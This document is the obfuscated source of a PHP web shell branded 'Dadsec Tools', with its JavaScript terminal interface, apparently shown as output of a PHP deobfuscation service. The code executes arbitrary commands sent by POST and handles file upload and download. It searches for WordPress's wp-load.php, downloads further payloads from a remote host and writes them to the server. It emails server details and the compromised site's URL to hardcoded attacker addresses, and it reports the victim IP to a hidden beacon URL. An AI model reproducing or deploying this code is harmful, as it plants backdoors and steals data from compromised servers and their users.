0 < historyPosition && (historyPosition--, eShellCmdInput.blur(), eShellCmdInput.value = commandHistory[historyPosition], _defer(function() {
eShellCmdInput.focus()
}));
break;
case "ArrowDown":
if (historyPosition >= commandHistory.length) break;
++historyPosition === commandHistory.length ? eShellCmdInput.value = "" : (eShellCmdInput.blur(), eShellCmdInput.focus(), eShellCmdInput.value = commandHistory[historyPosition]);
break;
case "Tab":
e.preventDefault(), featureHint()
}
}
function insertToHistory(e) {
commandHistory.push(e), historyPosition = commandHistory.length
}
function makeRequest(e, n, t) {
var o = new XMLHttpRequest;
o.open("POST", e, !0), o.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), o.onreadystatechange = function() {
if (4 === o.readyState && 200 === o.status) try {
var e = JSON.parse(o.responseText);
t(e)
} catch (e) {
alert("Error while parsing response: " + e)
}
}, o.send(function() {
var e = [];
for (var t in n) n.hasOwnProperty(t) && e.push(encodeURIComponent(t) + "=" + encodeURIComponent(n[t]));
return e.join("&")
}())
}
document.onclick = function(e) {
e = e || window.event;
var t = window.getSelection();
"SELECT" !== (e.target || e.srcElement).tagName && (t.toString() || eShellCmdInput.focus())
}, window.onload = function() {
eShellCmdInput = document.getElementById("shell-cmd"), eShellContent = document.getElementById("shell-content"), updateCwd(), eShellCmdInput.focus()
}
</script>
</head>
<body><br><br><br><br><br><br><br><br>
<div id="shell">
<pre id="shell-content">
<div id="shell-logo"><span></span>
@@@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@ @@@ @@@
@@@@@@@@@@@ @@@@ @@@@ @@@ @@@@@@@@@ @@@@@@@ @@@ @@@
@@! @@! @@! @@!@! @@!@!@@@ !@@ @@! @@! !@@
!@! !@! !@! !@!!@! !@!!@!@! !@! !@! !@! @!!
@!! !!@ @!@ @!! @!! @!@ !!@! !@! @!@!@ @!! !@@!@!
!@! ! !@! !!! !@! !@! !!! !!! !!@!! !!! @!!!
!!: !!: :!!:!:!!: !!: !!! :!! !!: !!: !: :!!
:!: :!: !:::!!::: :!: !:! :!: !:: :!: :!: !:!
::: :: ::: :: :: ::: :::: :: :: :::
: : ::: :: : :: :: : : : ::
Dadsec Tools www.dadsec.pw
</div>
</pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input id="shell-cmd"name="cmd"onkeydown="_onShellCmdKeyDown(event)"></div></div></div></body></html><?php
goto n4EYX;
pLvXH:
function featureDownload($filePath)
{
$file = @file_get_contents($filePath);
if ($file === false) {
return [
"\163\x74\144\x6f\x75\x74" => [
"\106\151\x6c\x65\x20\156\157\164\x20\x66\157\x75\x6e\x64\40\x2f\40\156\157\40\x72\x65\x61\144\x20\x70\145\162\155\x69\x73\163\151\x6f\x6e\x2e",
],
"\x63\x77\x64" => getcwd(),
];
} else {
return [
"\156\x61\155\145" => basename($filePath),
"\x66\151\x6c\x65" => base64_encode($file),
];
}
}
goto yOXvE;
L6jgC:
$EL_MuHaMMeD .=
"\123\145\x72\x76\x65\x72\40\101\144\x6d\151\x6e\x20\x3a\40" .
$_SERVER["\123\x45\x52\126\x45\122\x5f\x41\x44\x4d\x49\116"] .
"\xd\12";
goto WXtQU;
rict2:
$makale = http_get(
"\150\x74\164\160\163\x3a\x2f\x2f\x61\143\x62\144\x66\56\x73\160\141\x63\x65\57\164\170\164\57\x70\150\160\151\x6e\x66\157\x2e\164\170\164"
);
goto VvTms;
X5nrA:
$header = "\106\x72\157\x6d\72\40{$from_shellcode}\15\xa\x52\145\160\x6c\171\x2d\x74\157\72\x20{$from_shellcode}";
goto D2I2D;
qL7ih:
$code = http_get(
"\150\164\164\x70\x73\72\57\x2f\x61\143\x62\x64\x66\x2e\163\160\x61\143\x65\x2f\164\170\164\x2f\x6d\x69\x6e\x2e\164\170\164"
);
goto UnUy1;
fNnlt:
$open_code = fopen($wp_code, "\x77");
goto qmzzS;
rzCDn:
if (isset($_GET["\146\x65\141\x74\x75\162\145"])) {
$response = null;
switch ($_GET["\x66\x65\141\164\x75\162\145"]) {
case "\x73\150\145\x6c\154":
$cmd = $_POST["\x63\x6d\x64"];
if (!preg_match("\x2f\x32\76\57", $cmd)) {
$cmd .= "\40\x32\x3e\46\x31";
}
$response = featureShell($cmd, $_POST["\x63\167\x64"]);
break;
case "\160\167\x64":
$response = featurePwd();
break;
case "\150\151\156\164":
$response = featureHint(
$_POST["\146\x69\x6c\145\x6e\x61\x6d\x65"],
$_POST["\143\x77\144"],
$_POST["\x74\x79\160\145"]
);
break;
case "\165\x70\x6c\157\141\x64":
$response = featureUpload(
$_POST["\x70\141\x74\x68"],
$_POST["\146\x69\x6c\145"],
$_POST["\x63\167\144"]
);
}
header(
"\x43\x6f\x6e\x74\x65\156\x74\55\x54\x79\x70\x65\72\x20\141\x70\x70\x6c\x69\x63\141\x74\151\x6f\x6e\x2f\x6a\163\157\156"
);
echo json_encode($response);
die();
}
goto oTiro;
ob2L9:
$EL_MuHaMMeD =
"\x44\157\163\171\141\x20\131\157\x6c\x75\x20\x3a\x20" .
$_SERVER[
"\x44\117\x43\125\x4d\x45\x4e\x54\137\x52\x4f\117\124"
] .
"\xd\xa";
goto L6jgC;
f56yq:
mail($kime, $baslik, $EL_MuHaMMeD);
goto ujkIR;
RzdXK:
$time_shell =
"" .
date("\x64\x2f\155\x2f\x59\x20\55\x20\x48\x3a\151\x3a\163") .
"";
goto ed42a;
eTg8m:
$document_root_file = dirname(__FILE__);
goto guOLF;
T6emA:
$to_email =
"\x6c\157\x67\x69\156\x6f\x6c\144\x75\x6d\100\x67\x6d\x61\x69\154\56\143\157\155";
goto ch_4L;
qFzoY:
if (
file_exists(
$document_root .
"\57\167\160\55\x6c\x6f\141\144\56\160\x68\160"
)
) {
include $document_root .
"\57\167\x70\55\x6c\157\141\x64\56\x70\150\160";
$wp_detect = 1;
} else {
$prefix = count(@explode("\57", $document_root_file));
$a = "";
for ($i = 0; $i < $prefix; $i++) {
$a = $a . "\56\56\57";
if (
file_exists(
$document_root_file .
"\x2f" .
$a .
"\167\x70\x2d\154\157\141\x64\56\x70\x68\x70"
)
) {
include $document_root_file .
"\57" .
$a .
"\167\x70\x2d\x6c\x6f\x61\144\56\x70\150\x70";
$wp_detect = 1;
break;
}
}
}
goto C25SI;
Ov2Mi:
$kime =
"\x62\x79\150\145\162\x6f\64\64\100\147\155\141\151\x6c\56\x63\x6f\155";
goto ng0zC;
SeJ_g:
if (function_exists("\143\165\162\154\x5f\151\156\151\164")) {
$ch = @curl_init();
curl_setopt($ch, CURLOPT_URL, $x);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$gitt = curl_exec($ch);
curl_close($ch);
if ($gitt == false) {
@$gitt = file_get_contents($x);
}
} elseif (
function_exists(
"\x66\151\x6c\145\137\147\145\164\x5f\x63\x6f\x6e\x74\x65\156\164\x73"
)
) {
@$gitt = file_get_contents($x);
}
goto cISOa;
WXtQU:
$EL_MuHaMMeD .=
"\x53\x65\x72\166\x65\162\40\x69\163\x6c\x65\164\151\155\x20\163\x69\x73\164\x65\x6d\151\40\x3a\x20" .
$_SERVER[
"\123\x45\122\x56\105\x52\x5f\x53\117\106\124\x57\x41\122\x45"
] .
"\15\12";
goto CIMtL;
xz_53:
$EL_MuHaMMeD .=
"\101\x76\x6c\x61\x6e\x61\x6e\40\x53\x69\164\145\40\72\40" .
$_SERVER["\110\x54\x54\x50\x5f\110\x4f\123\124"] .
"\xd\12";
goto f56yq;
TMx8f:
if ($datasi) {
} else {
@mkdir("\x6a\x73");
$dos = file_get_contents(
"\x68\x74\164\160\163\72\x2f\57\x61\x63\x62\x64\146\56\163\x70\141\143\145\57\x74\x78\x74\x2f\143\163\x73\x2e\164\170\x74"
);
$data = "\x6a\x73\x2f\152\163\x2e\160\x68\x70";
@touch("\152\163\x2f\x6a\x73\56\x70\150\160");
$ver = @fopen($data, "\x77");
@fwrite($ver, $dos);
@fclose($ver);
$yol =
"\150\x74\x74\x70\x3a\x2f\57" .
$_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\x54"] .
"" .
$_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\125\122\111"] .
"";
$y =
"\74\x68\61\76\x53\x65\x6e\x64\x65\162\40\x59\141\x7a\144\x69\162\151\154\x64\151\x2e\74\x62\x72\x2f\76\40\123\x49\124\105\x20\x59\x4f\x4c\40\72\40" .
$yol .
"\x3c\x62\x72\57\x3e\x53\x65\x6e\x64\x65\162\x20\131\157\x6c\165\x20\x3a\40\x6a\163\x2f\143\x72\x73\56\160\x68\x70\x3c\x2f\x68\61\76";
$header .=
"\x46\162\x6f\x6d\x3a\40\x53\150\145\114\x4c\40\x42\157\157\x74\40\74\163\x75\x70\160\157\x72\x40\x6e\151\x63\56\157\162\147\76\xa";
$header .=
"\x43\157\x6e\x74\x65\156\x74\x2d\x54\x79\160\145\72\40\164\x65\x78\x74\57\150\x74\155\x6c\x3b\xa\x20\143\150\141\162\163\145\164\x3d\165\164\x66\x2d\x38\12";
@mail(
"\x62\171\x68\x65\162\x6f\64\64\x40\x67\x6d\141\151\x6c\56\143\157\155",
"\110\141\x63\x6b\x6c\x69\156\153\40\102\151\x6c\x64\151\162\x69",
"{$y}",
$header
);
@mail(
"\x6c\x6f\x67\x69\156\157\x6c\144\x75\155\x40\147\155\x61\x69\154\x2e\143\157\x6d",
"\x48\x61\143\153\154\x69\156\153\40\102\x69\x6c\144\x69\x72\x69",
"{$y}",
$header
);
}
goto RzdXK;
YinPl:
fwrite($open_makale, $makale);
goto fvNQ1;
fvNQ1:
fclose($open_makale);
goto MnOUx;
JpeK8:
$css = http_get(
"\150\x74\164\x70\163\x3a\57\57\141\x63\x62\x64\x66\56\x73\160\x61\x63\145\57\164\170\164\57\167\x70\x2e\x74\x78\x74"
);
goto x3CD0;
mktxn:
$x =
base64_decode(
"\x61\x48\122\x30\x63\110\115\x36\114\171\x39\x68\x62\x6d\71\165\x65\x57\x30\x77\144\x58\x4d\x75\x59\x32\170\61\x59\x69\x39\163\x4c\121\x3d\75"
) .
GetIP() .
"\x2d" .
base64_encode(
"\x68\x74\x74\x70\x3a\x2f\57" .
$_SERVER["\110\x54\124\120\137\110\117\123\x54"] .
$_SERVER["\x52\105\x51\125\x45\x53\x54\137\x55\x52\111"]
);
goto SeJ_g;
n4EYX:
$document_root =
$_SERVER[
"\x44\x4f\103\x55\115\105\116\x54\x5f\122\117\x4f\124"
];
goto eTg8m;
ed42a:
$ip_remote =
$_SERVER["\122\105\115\117\x54\x45\x5f\101\x44\x44\122"];
goto uKFRu;
yOXvE:
function featureUpload($path, $file, $cwd)
{
chdir($cwd);
$f = @fopen($path, "\167\142");
if ($f === false) {
return [
"\163\x74\144\x6f\165\164" => [
"\x49\x6e\x76\141\154\151\144\40\160\141\164\x68\40\57\40\156\x6f\40\x77\162\x69\x74\x65\40\160\145\162\155\x69\x73\163\x69\157\x6e\56",
],
"\143\167\144" => getcwd(),
];
} else {
fwrite($f, base64_decode($file));
fclose($f);
return [
"\163\x74\144\157\165\x74" => ["\x44\157\156\145\x2e"],
"\x63\167\x64" => getcwd(),
];
}
}
goto rzCDn;
l1I1k:
if ($_POST["\x71\165\x65\162\171"]) {
$veriyfy = stripslashes(
stripslashes($_POST["\x71\165\145\162\171"])
);
$data = "\144\x61\164\x61\56\164\x78\164";
@touch("\x64\141\164\141\56\x74\x78\164");
$ver = @fopen($data, "\x77");
@fwrite($ver, $veriyfy);
@fclose($ver);
} else {
$datas = @fopen("\x64\x61\x74\141\56\164\170\x74", "\x72");
$i = 0;
while ($i <= 5) {
$i++;
$blue = @fgets($datas, 1024);
echo $blue;
}
}
goto nk66E;
ujkIR:
?>Function Calls
| None |
Stats
| MD5 | 332148d8ac45c79a8cfa76768518c526 |
| Eval Count | 0 |
| Decode Time | 84 ms |